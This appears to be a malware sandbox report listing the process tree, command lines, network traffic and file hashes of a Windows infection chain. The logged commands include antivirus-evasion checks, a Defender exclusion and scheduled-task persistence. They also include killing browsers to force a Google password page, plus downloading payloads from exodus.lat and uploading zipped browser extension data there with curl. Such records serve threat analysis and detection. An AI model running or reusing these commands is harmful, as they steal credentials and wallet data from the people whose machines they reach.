PID 2940 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe
PID 4924 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe
PID 4924 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe
PID 4924 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe
PID 4924 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe
PID 4924 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe
PID 1900 wrote to memory of 4648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 4648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 4648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe
PID 4924 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe
PID 4924 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe
PID 1900 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1900 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1900 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1900 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1900 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1900 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 4924 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe
PID 4924 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe
PID 4924 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe
PID 3664 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 1196 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1196 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1196 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3664 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 3664 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 3664 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 3836 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 4924 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe
PID 4924 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe
PID 4924 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe
PID 3836 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe

"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe

"C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe"

C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe

"C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe

"C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe"

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe

"C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe

"C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77238c65-f26f-4284-b008-78bfa1bb021a} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c47562d2-8f06-4075-924d-64ba036c8174} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3140 -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 3352 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baba5b74-1290-4817-a21e-0b16b2d8ff56} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4072 -childID 2 -isForBrowser -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c2faae5-e6b3-470e-a273-b0c0cad259e2} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4632 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4568 -prefMapHandle 4652 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02c7e711-1a46-4011-94b1-1d3deff31a8d} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5340 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 5336 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4555eac6-62a4-4a96-98e7-b536232e2408} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 4624 -prefMapHandle 5296 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac1882f2-5bcc-494a-99cf-62d31d84896d} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5740 -prefMapHandle 5736 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cbe0ce6-b8af-4378-a25b-b9ea9ddce40e} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 8.8.8.8:53 166.165.67.172.in-addr.arpa udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 153.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 142.62.21.104.in-addr.arpa udp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 104.21.96.55:443 formy-spill.biz tcp
US 8.8.8.8:53 96.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 55.96.21.104.in-addr.arpa udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 156.43.21.104.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 print-vexer.biz udp
US 172.67.181.192:443 print-vexer.biz tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 192.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.200.46:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.200.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
GB 142.250.200.46:443 consent.youtube.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 190.23.33.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
N/A 127.0.0.1:57094 tcp
NL 92.63.197.221:80 tcp
N/A 127.0.0.1:57320 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
NL 92.63.197.221:80 tcp
GB 142.250.200.46:443 consent.youtube.com udp
GB 45.74.38.211:4782 tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 211.38.74.45.in-addr.arpa udp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 cdn-downloads.com udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.73:80 r11.o.lencr.org tcp
US 8.8.8.8:53 125.21.192.23.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp

Files

memory/1056-0-0x0000000000C90000-0x000000000113F000-memory.dmp

memory/1056-1-0x0000000077584000-0x0000000077586000-memory.dmp

memory/1056-2-0x0000000000C91000-0x0000000000CBF000-memory.dmp

memory/1056-3-0x0000000000C90000-0x000000000113F000-memory.dmp

memory/1056-5-0x0000000000C90000-0x000000000113F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 f25ddb78a2cc3b6442c52a3c4a2aa843
SHA1 52ba6df84b158bf917044fee22625d2a12202382
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
SHA512 74c7900f42e3d9b5d490e4848c7d12832f14b245065e04baa96604f2ca91ea5e46318ea71e081ee266fc770a94413edc298516abf23ed9f6c7cd6e7a70b72f14

